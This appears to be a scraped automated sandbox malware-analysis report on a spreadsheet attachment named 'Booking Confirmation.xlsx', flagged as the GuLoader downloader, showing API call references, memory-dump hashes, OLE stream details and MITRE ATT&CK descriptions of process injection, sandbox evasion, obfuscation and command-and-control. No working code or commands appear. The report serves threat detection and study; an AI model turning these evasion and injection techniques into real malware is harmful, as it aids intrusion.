__vbaNew2.MSVBVM60(004038E8,00422390,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00421374
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000014,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00421399
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038F8,000000B8,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 004213C3
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004015E6), ref: 004213CC

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2
String ID:
API String ID: 4261391273-0
Opcode ID: b515260320fe76fb677e92dd8e01a5912bc5a618f5e908fc7f1979c0ea3bcda1
Instruction ID: aee08d0c6e21a8c7150545432cd667b8fa7e227a0db0c120837919a44c6660a4
Opcode Fuzzy Hash: b515260320fe76fb677e92dd8e01a5912bc5a618f5e908fc7f1979c0ea3bcda1
Instruction Fuzzy Hash: 6A11BF34A40215BBDB10DFA4DD8AEABBBBDEB29701F504026F905F35B0C6785801CBA8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Booking Confirmation.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Booking Confirmation.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General

Function 004018A4, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 416
COMMONCrypto

Function 00405732, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 173
memoryCOMMONCrypto